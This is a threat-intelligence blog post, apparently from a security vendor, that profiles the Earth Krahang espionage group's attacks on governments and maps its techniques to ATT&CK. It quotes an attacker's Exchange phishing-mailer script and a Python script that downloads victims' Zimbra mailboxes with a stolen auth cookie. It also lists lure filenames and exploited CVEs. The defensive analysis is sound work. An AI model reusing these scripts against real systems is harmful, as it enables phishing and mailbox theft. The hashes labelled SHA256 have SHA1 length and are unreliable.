CREATED ON October 23, 2025

Earth Krahang APT Group: Global Government Cyberespionage Campaigns (2022–2024) and TTP Analysis

Earth Krahang group has been active since early 2022, primarily targeting government entities across multiple continents, including Southeast Asia, Europe, the Americas, and Africa.
Earth Krahang's operations are characterized by their strategic exploitation of intergovernmental trust. The group has been observed leveraging compromised government infrastructure to launch attacks on other governmental organizations. This includes hosting malicious payloads, proxying attack traffic, and disseminating spear-phishing emails using compromised government email accounts.

Earth Krahang's operations are characterized by their strategic exploitation of intergovernmental trust. The group has been observed leveraging compromised government infrastructure to launch attacks on other governmental organizations. This includes hosting malicious payloads and disseminating spear-phishing emails using compromised government email accounts.

Earth Krahang's operations demonstrate a broad and strategic targeting profile. Analysis revealed approximately 70 confirmed victims across 23 countries. Government organizations constitute the primary focus of Earth Krahang. For instance, in one country, the group successfully compromised organizations across 11 different government ministries. Overall, at least 48 government entities were confirmed compromised [1].

In the following sections, we will review the historical and significant campaigns attributed to Earth Krahang group, analyze their tactics, techniques, and procedures (TTPs), and conclude with a section on how Picus simulates Earth Krahang's attacks to help organizations evaluate and strengthen their defensive posture.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

History & Major Activities of Earth Krahang Group

2022 - 2024 - Earth Krahang group conducted a two-year cyberespionage operation, infiltrating 70 organizations—predominantly government agencies—across 23 countries.

ATT&CK Mapping (TTPs) of Earth Krahang Group

Tactic: Reconnaissance

T1589.002 Gather Victim Identity Information: Email Addresses

Earth Krahang gathered hundreds of email addresses during reconnaissance. In one incident, they used a compromised government mailbox to send a malicious RAR attachment to 796 addresses within that same agency. The RAR contained an LNK that installed the Xdealer malware and displayed a decoy document about the agency [1].

Tactic: Initial Access

T1190 Exploit Public-Facing Application

Earth Krahang scans public-facing servers aggressively, using recursive searches for folders like .git and .idea, brute-forcing directories, and enumerating subdomains to discover unmaintained or misconfigured assets. They run vulnerability scanners and exploit frameworks such as sqlmap, nuclei, xray, vscan, pocsuite, and wordpressscan to identify weaknesses that grant server access. The group repeatedly abused remote command-execution flaws — notably CVE-2023-32315 (OpenFire) and CVE-2022-21587 (Oracle WADI) [1].

T1199 Trusted Relationship

Earth Krahang exploits trust between governments by compromising government web servers to host backdoors and distributing the download links via spear-phishing emails to other government entities, making the malicious links appear legitimate and potentially bypassing some domain blacklists. The actor leveraged a compromised government email account to send messages to other government entities, using the following subjects in their spear-phishing emails [1]:

salary
Malaysian Ministry of Defense Circular
Malaysian defense minister visits Hungary
ICJ public hearings- Guyana vs. Venezuela
About Guyana Procurement Proposal for Taiwan <redacted>

They used the following script to send spear‑phishing emails [1]:

# 输入Exchange服务器的URL、用户名和密码
credentials = Credentials(username=<REDACTED>, password=<REDACTED>)
config = Configuration(server=<REDACTED>, credentials=credentials, auth_type=NTLM)

# 创建Exchange账户对象
account = Account(primary_smtp_address=<REDACTED>, credentials=credentials, autodiscover=False, config=config)

f = open(<REDACTED>,"r")
lines = f.readlines()
count = 0
for line in lines:
count += 100
# 构造电子邮件对象
to_recipients = [Mailbox(email_address=line.strip())]
subject = "Malaysian Ministry of Defense Circular"
guid = str(uuid.uuid1().hex)
body = "Kyrgyzstan criminals fled to Malaysia, check the details::https://<REDACTED>/data/frontend/hu/index.php?id="+guid
message = Message(account=account, subject=subject, body=body, to_recipients=to_recipients)
# 发送电子邮件
message.send()
content_tz = line.strip()+" "+body
print(line.strip()+':邮件发送成功')

T1566 Phishing

Earth Krahang also employs spear-phishing emails to target individuals. These emails are designed to deceive recipients into opening attachments or clicking on embedded links, which then trigger the execution of a pre-configured backdoor on the victims' systems. The filenames of these backdoors frequently reference geopolitical topics, reflecting the type of lure favored by the group. Some example files are listed below [1]:

"Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe"

คำบอกกล่าวคำฟ้อง.rar
(translated as "Notice of complaint.rar")

"ร่างสถานะ ครม. รว. ไทย-โรมาเนีย as of 25 Feb 2022.doc.exe"
(translated as "Draft Cabinet status of Thailand-Romania as of 25 Feb 2022.doc.exe")

"Malaysian defense minister visits Hungary.Malaysian defense minister visits Hungary.exe"

"ICJ public hearings- Guyana vs. Venezuela.ICJ public hearings- Guyana vs. Venezuela.exe"

"On the visit of Paraguayan Foreign Minister to Turkmenistan.exe"

"pay-slip run persal payslip.pay-slip run persal payslip.docx.exe"

Tactic: Execution

T1059.006 Command and Scripting Interpreter: Python

A Python script was identified that the Earth Krahang group used to exfiltrate emails from a Zimbra mail server by packaging the victim's mailbox through the server API with a stolen authenticated cookie [1]:

def getFile(email, cookies):
headers = {
'Host': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/251000 Firefox/102.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Cookie': "ZM_AUTH_TOKEN="+cookies
}
url = "https:// /service/home/%s?fmt=tgz&query=after:%s"%(email,times)
resp = requests.get(url, stream=True, headers=headers,verify=False)
total = int(resp.headers.get('content-length', 0))
fname = email
with open(fname, 'wb') as file, tqdm(
desc=fname,
total=total,
unit='iB',
unit_scale=True,
unit_divisor=1024,
) as bar:
for data in resp.iter_content(chunk_size=1024):
size = file.write(data)
bar.update(size)

Tactic: Persistence

T1133 External Remote Services

The threat actor installs SoftEther VPN on compromised public‑facing servers, using certutil commands to download and install the VPN server binary [1]. By running SoftEther as an external remote service, they establish persistent access to the victim's network. This access lets the actor connect back into the environment to carry out post‑exploitation activity such as lateral movement and data exfiltration [1].

Tactic: Privilege Escalation

T1068 Exploitation for Privilege Escalation

The Earth Krahang group exploited software flaws to perform local privilege escalation. They leveraged CVE-2021-4034 (PwnKit), CVE-2021-22555, and CVE-2016-5195 (Dirty COW) to gain elevated rights on Linux systems [1].

Tactic: Defense Evasion

T1036.005 Masquerading: Match s Resource Name or Location

Earth Krahang renamed the SoftEther server executable to taskllst.exe, tasklist.exe, or tasklist_32.exe on Windows and to curl on Linux to make it appear as a legitimate system file [1].

T1574.001 Hijack Execution Flow: DLL

Earth Krahang frequently used Cobalt Strike during the initial stage of attacks. They exploited DLL side‑loading — in one case dropping three files: fontsets.exe (SHA256: 97c668912c29b8203a7c3bd7d5d690d5c4e5da53), faultrep.dll (SHA256: a94d0e51df6abbc4a7cfe84e36eb8f38bc011f46), and faultrep.dat. The legitimate fontsets.exe was abused to side‑load the custom shellcode loader faultrep.dll, which decodes embedded shellcode stored in faultrep.dat; that decoded payload is Cobalt Strike [1].

Tactic: Lateral Movement

T1021.001 Remote Services: Remote Desktop Protocol

Earth Krahang configured RDP to move laterally or maintain access by modifying system settings. They set the Windows Registry key "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" to 0 to enable Remote Desktop connections [1].

How Picus Simulates Earth Krahang Attacks?

We also strongly suggest simulating Earth Krahang Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Earth Krahang:

Threat ID	Threat Name	Attack Module
97377	Earth Krahang Threat Group Campaign Malware Download Threat	Network Infiltration
55182	Earth Krahang Threat Group Campaign Malware Email Threat	Network Infiltration
96617	Earth Krahang Threat Group Campaign	Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks," Trend Micro. Accessed: Oct. 17, 2025. [Online]. Available: https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html